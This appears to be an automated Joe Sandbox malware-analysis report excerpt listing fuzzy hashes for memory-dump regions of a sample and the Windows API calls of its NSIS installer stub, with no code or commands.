                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7c0c49b616287df7ad24ac2715de4860432d6937b5446b609d7b641ddbb2d07
                                                                                                              • Instruction ID: 0d102d51398a155c42813bb52660876500dae4e7126203d9cdc30c6542959c70
                                                                                                              • Opcode Fuzzy Hash: d7c0c49b616287df7ad24ac2715de4860432d6937b5446b609d7b641ddbb2d07
                                                                                                              • Instruction Fuzzy Hash: 91210378D0021ADFDB40DFA5C4556EEBBB1FB89300F109929D901B3260DB785A46CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2954813554.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_9d000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: af70f5d0e204b3cef50fd046a4430efce4a1d26e17c50e76bd06a63e610ddebd
                                                                                                              • Instruction ID: b1802fe5fc923ea1cf7fce13192edd3f1263e388e6c3370ac7e595d090edf1bd
                                                                                                              • Opcode Fuzzy Hash: af70f5d0e204b3cef50fd046a4430efce4a1d26e17c50e76bd06a63e610ddebd
                                                                                                              • Instruction Fuzzy Hash: 6F112676544244CFCF01CF10D5C0B16BFB2FB94324F24C2AAD8490B616C33AD856DBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2954876083.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_ad000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                                                              • Instruction ID: 24224eb49a4169dc628516ff38238fcbbf638bde356d9df8a8d0842f0f34ad0f
                                                                                                              • Opcode Fuzzy Hash: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                                                              • Instruction Fuzzy Hash: 1911BB79504284DFCB11CF54D5C0B15BBA2FB85324F28C6AAD84A4BA56C33AD84ACB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b091df98d9d2fbb3a12c25f2d6a1f9fda536d35873c1157a4fe418f0005570dd
                                                                                                              • Instruction ID: 044be66e09402dc2d57a878a3b01853f78f7251e2e313660a161a3e120b809c1
                                                                                                              • Opcode Fuzzy Hash: b091df98d9d2fbb3a12c25f2d6a1f9fda536d35873c1157a4fe418f0005570dd
                                                                                                              • Instruction Fuzzy Hash: C30124327091146FCF069E94A811AEE3BB7EBC9750F18802AF909C7391DF758D029BE0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbbd3b2f14c49f325028bd96ec6d3762a2b4797c0d9e79cd11991f7a5914d178
                                                                                                              • Instruction ID: 35eeb13748d53476e42a719965017fb50bf9749baf34e2a0131fae10abdc67fa
                                                                                                              • Opcode Fuzzy Hash: dbbd3b2f14c49f325028bd96ec6d3762a2b4797c0d9e79cd11991f7a5914d178
                                                                                                              • Instruction Fuzzy Hash: E4016D307406018F9314DF2EC44191AB7F6FF89794305856AE406CB331DB30ED86CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 70d7c4a22c45714dde45c613d8486267e4758eb3f307cc663bb6dd239bad43ff
                                                                                                              • Instruction ID: d83844e960c61b38700947de6ad6a0e9641ac3d67df9f52d93e4ad7bf612cbda
                                                                                                              • Opcode Fuzzy Hash: 70d7c4a22c45714dde45c613d8486267e4758eb3f307cc663bb6dd239bad43ff
                                                                                                              • Instruction Fuzzy Hash: D001F432B043158FDB14AB79989463F76EBBFC4664714843AD909C7320FF71CC408691
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6befca7fd5a273b24b06e15319f46b41f38d10f25dce5f150eb35f8c2007b7bb
                                                                                                              • Instruction ID: a92f75f4886ec05e29e584d2d8898d29bfd7542af7fd1d4debcca2869b7736a5
                                                                                                              • Opcode Fuzzy Hash: 6befca7fd5a273b24b06e15319f46b41f38d10f25dce5f150eb35f8c2007b7bb
                                                                                                              • Instruction Fuzzy Hash: AC015674D02204DFCB04CFB4D855AEEBBB1FBCA301F90A429D400A3261DB365881CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 904dfab1482ceb9c7e2788a3f842a7c883ece68b98a50ebb0e5f2ac1193f9932
                                                                                                              • Instruction ID: 2c8714cb95d40170507d6d9ee1abe5eab9d10e2c052463660c77aab7b5849b37
                                                                                                              • Opcode Fuzzy Hash: 904dfab1482ceb9c7e2788a3f842a7c883ece68b98a50ebb0e5f2ac1193f9932
                                                                                                              • Instruction Fuzzy Hash: 68F04F353002146FDB185AA69864A7B7A9BEFDD2A1B14C429F94DC7391DE71CC0197A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 57e104f801e84c94eb11deebaddb253c6ca386f61899c4aa2b98b9e67cb736d0
                                                                                                              • Instruction ID: 6555f1701ea32ef990fca52d9fda5eacce96f843e4f1f5e8d87070f7b1af7249
                                                                                                              • Opcode Fuzzy Hash: 57e104f801e84c94eb11deebaddb253c6ca386f61899c4aa2b98b9e67cb736d0
                                                                                                              • Instruction Fuzzy Hash: F6016D75D00248DFDB49CFA1C4196E9BBB2FB8A301F545478EA0577260CB76694BCF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b08179cd2f01b34a0cd3ed2ddb1001c3da3587c5cc70e6ddc76b361d91943207
                                                                                                              • Instruction ID: 26c9e62055ab031fbb8269bd237d202012acd378ebca23e6aaf10c18c9be8531
                                                                                                              • Opcode Fuzzy Hash: b08179cd2f01b34a0cd3ed2ddb1001c3da3587c5cc70e6ddc76b361d91943207
                                                                                                              • Instruction Fuzzy Hash: 3EF0F431E442149FEB109BA4C9047AF7FB1FBC8354F00652AE40597650DB34A49ECBD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee252c8f065650432ae8c67345a9d2a3fa8047a227807d527caf70a52308846c
                                                                                                              • Instruction ID: 6fcbd6dbd4fa6e239c9aff7084f2cc0728e969055ba5116fd9af2a2404b50e80
                                                                                                              • Opcode Fuzzy Hash: ee252c8f065650432ae8c67345a9d2a3fa8047a227807d527caf70a52308846c
                                                                                                              • Instruction Fuzzy Hash: C4F01435D01208CBDB04DFA9D8546EDB7B5FB8A305F50A429C904B3261DB399991CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd0bf8a17f7d1345786ac541862c40f72f840a9e2ee7d938f456b9084ec0a26e
                                                                                                              • Instruction ID: f6c0854926cd1ff8393d66000ba9827da5ed308e0a790fbddbb685fefbc36e46
                                                                                                              • Opcode Fuzzy Hash: bd0bf8a17f7d1345786ac541862c40f72f840a9e2ee7d938f456b9084ec0a26e
                                                                                                              • Instruction Fuzzy Hash: A9F0552230430013E30432BC5844B6F3AAEABC8B96B000C36E602EB358DF989C4A43F2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e50739ef0a8b7489e5f19d91e795623dd0d2b70e76d8cbca52e247b28214fd5
                                                                                                              • Instruction ID: 9dca624b9f007e87a988976c20e345fe9d447793daff04070f6c17a89f37c36c
                                                                                                              • Opcode Fuzzy Hash: 3e50739ef0a8b7489e5f19d91e795623dd0d2b70e76d8cbca52e247b28214fd5
                                                                                                              • Instruction Fuzzy Hash: 5EF0A531559F829FF3116B30ACBC26E7F70FB4B313B99AD56E04A86472CB684446CB15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 27a0d3cec955fec8d4789786c6c16a52f853960fb372e794dc8af8d7e6da7282
                                                                                                              • Instruction ID: 59412ac02c2e4f0febcdcab8cebfe74ec54950c13998f259d9db8cfd75f62f36
                                                                                                              • Opcode Fuzzy Hash: 27a0d3cec955fec8d4789786c6c16a52f853960fb372e794dc8af8d7e6da7282
                                                                                                              • Instruction Fuzzy Hash: 14E06570419B82EFE3111B20ACAC2AA7B70FB07307B856D8AE04A92032C7380084CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d1353c98dbb09aa99173490783a1db897b6e92d18f3047fe5144124fb3bc4e7
                                                                                                              • Instruction ID: d447c2d6fa29a89e36baa138cd24812b67a3afa59a1f620169df5f3fea49cba9
                                                                                                              • Opcode Fuzzy Hash: 8d1353c98dbb09aa99173490783a1db897b6e92d18f3047fe5144124fb3bc4e7
                                                                                                              • Instruction Fuzzy Hash: B0F03074D04308EFCB58DFB9D4896DDBBB5EB49351F6080B9D819A3261EB314A86CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8939c3d76ccd4e80990f25560e5193274ce948c0f7ce68fa8c8085c3bb604826
                                                                                                              • Instruction ID: 19a0fd6cf4eb7e65046da4e760099d981d9050e2cbcb8c6d300f5c0f27b2c08d
                                                                                                              • Opcode Fuzzy Hash: 8939c3d76ccd4e80990f25560e5193274ce948c0f7ce68fa8c8085c3bb604826
                                                                                                              • Instruction Fuzzy Hash: 89E02632E512678EC705ABA4EC044EEBB30EE83321B1143A7D0207B080EF31168DC7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b05deab3a2636dd4feb8c1ae8f0f46c442399f1139434c81339dee758d18b095
                                                                                                              • Instruction ID: 4727dcafb0ff5de016700a76b3e2b0c5fd232cbcb800fbc96220cdcecefa698e
                                                                                                              • Opcode Fuzzy Hash: b05deab3a2636dd4feb8c1ae8f0f46c442399f1139434c81339dee758d18b095
                                                                                                              • Instruction Fuzzy Hash: B4E01A74D04208EFDB48DFB9D94969DBBF5EB49301F6081BAD819A3361EB309E46DB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 183362ec75dac317d14549bfde2343b9f4a628d1279b861eb2a84f0fd5d958ff
                                                                                                              • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                                                                              • Opcode Fuzzy Hash: 183362ec75dac317d14549bfde2343b9f4a628d1279b861eb2a84f0fd5d958ff
                                                                                                              • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ed34fade54ad8264bc0c25254d4c3835124a4ed748f27426027485296b8bdc1
                                                                                                              • Instruction ID: 6d55b3984f2c681b74d5564fa82e4ab079f8d5c7dd94bafbaf6e1a3390e841b3
                                                                                                              • Opcode Fuzzy Hash: 3ed34fade54ad8264bc0c25254d4c3835124a4ed748f27426027485296b8bdc1
                                                                                                              • Instruction Fuzzy Hash: 3DE0C2314083444FCB02E770EC651993B2AABC1600F008561D8040B66ADA781E868B62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1d32dae15a4150be039b1250eeaf851b9a1c8893f4164201afbb42a0fe8cdcc
                                                                                                              • Instruction ID: d5bcb25a99ba1588f3463817b751de531c27c96470af119a059b0686f4cfa377
                                                                                                              • Opcode Fuzzy Hash: d1d32dae15a4150be039b1250eeaf851b9a1c8893f4164201afbb42a0fe8cdcc
                                                                                                              • Instruction Fuzzy Hash: 3DD02E3080938CAFC760DB68D809BA9FB3CEB43211F0402ECE80C23102CB310E98C78A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 101e9ac45c5ebf9386a266e2141f210388272415fd941e15759a96cd57caa072
                                                                                                              • Instruction ID: 807dab4c2933872a2e018e3ab57698b90bd88c6b8cfc21cbd5023132fbd60417
                                                                                                              • Opcode Fuzzy Hash: 101e9ac45c5ebf9386a266e2141f210388272415fd941e15759a96cd57caa072
                                                                                                              • Instruction Fuzzy Hash: 1CD0673AB000089FCB049F99EC809DDF7B6FB98221B048117E915A3264C6319965DB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed4bdd24e803c58f6eeb7c09eb390a1772507ec764b584d0ee44ae582bdca692
                                                                                                              • Instruction ID: 36f8b10a25425ebe54bd30225c2f7b035a4dd54435cdb182de318151ed8d40d7
                                                                                                              • Opcode Fuzzy Hash: ed4bdd24e803c58f6eeb7c09eb390a1772507ec764b584d0ee44ae582bdca692
                                                                                                              • Instruction Fuzzy Hash: 6BD05E2210E7E00FDB17D3287860488BF600CC652135946EAE098C74E6EA450A8E878B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd5dbf4ea6d9c7514725a69e7235dc77bd45c9d73f3804dbf13c55671d1a23f5
                                                                                                              • Instruction ID: e8b316fba325bf04995429997d430314284e729b08c62aee06852505753220f3
                                                                                                              • Opcode Fuzzy Hash: fd5dbf4ea6d9c7514725a69e7235dc77bd45c9d73f3804dbf13c55671d1a23f5
                                                                                                              • Instruction Fuzzy Hash: B0C08033205711075614B21CFC5058F5E559DC57A2395DD37F404D31249F545D8FC2C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 81c01b2b42e62c0afa0abc78cd18ee855952fb771d148d7c8a3c9c7cef7af67e
                                                                                                              • Instruction ID: 861f4eb9152553af375ec5114990a6f2f9020bad1d75fd3bfbfe05cddf968cdb
                                                                                                              • Opcode Fuzzy Hash: 81c01b2b42e62c0afa0abc78cd18ee855952fb771d148d7c8a3c9c7cef7af67e
                                                                                                              • Instruction Fuzzy Hash: B8D0C971805208ABD754DBA4D805BAAB778E747202F4051A8A908632509B755D11D695
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: acce661b0d3939f0af6fc58784dc06bca09f55ca0dc2795e7a1a0b36fdd0cacd
                                                                                                              • Instruction ID: 92703cab8e49f7b8561e64bec6261c0bff4a9cd4b88b3f75ce26b0c683ac1cfb
                                                                                                              • Opcode Fuzzy Hash: acce661b0d3939f0af6fc58784dc06bca09f55ca0dc2795e7a1a0b36fdd0cacd
                                                                                                              • Instruction Fuzzy Hash: 5CD05E391093459FD7038B20C41058ABFA3AFDA340B05888AA0846B171C2306819DB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 935507920de23879daae5b215c0afff88b3204d70bc8bd033deceff03ad77bf8
                                                                                                              • Instruction ID: 0c734a33e6f0c8319ed5aed332d900567a61afc8a4d50a2501090c10f37fa739
                                                                                                              • Opcode Fuzzy Hash: 935507920de23879daae5b215c0afff88b3204d70bc8bd033deceff03ad77bf8
                                                                                                              • Instruction Fuzzy Hash: 69C012B5004E0A8BF2042B50AC1CB39B2B8B707307FC82910A008428318BB864548684
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8200b59cd4b5b3319fca05e15f23980bdce37accdd9c288c7c449547c69ef645
                                                                                                              • Instruction ID: 205686e9152ffb4778dd9bc7a3179ddeaa42de6b2bf827396456a069f0209252
                                                                                                              • Opcode Fuzzy Hash: 8200b59cd4b5b3319fca05e15f23980bdce37accdd9c288c7c449547c69ef645
                                                                                                              • Instruction Fuzzy Hash: FEC08C302683048FE2009A1DC884B0137ACFF85B08F4068E1F104CB632CB62FC008605
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b0434c366467e6c19ef31397981e5031db11e53f2a4349debb57d1d285f23f3
                                                                                                              • Instruction ID: 19a8d71e8aad4837209ed0339b36a5f2bc13b44087e5d02b66866b6ceab48330
                                                                                                              • Opcode Fuzzy Hash: 8b0434c366467e6c19ef31397981e5031db11e53f2a4349debb57d1d285f23f3
                                                                                                              • Instruction Fuzzy Hash: 80C080304543184FD701F775EC56655372F77C0501740C510E8051A56EDFBC5DC64F91
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
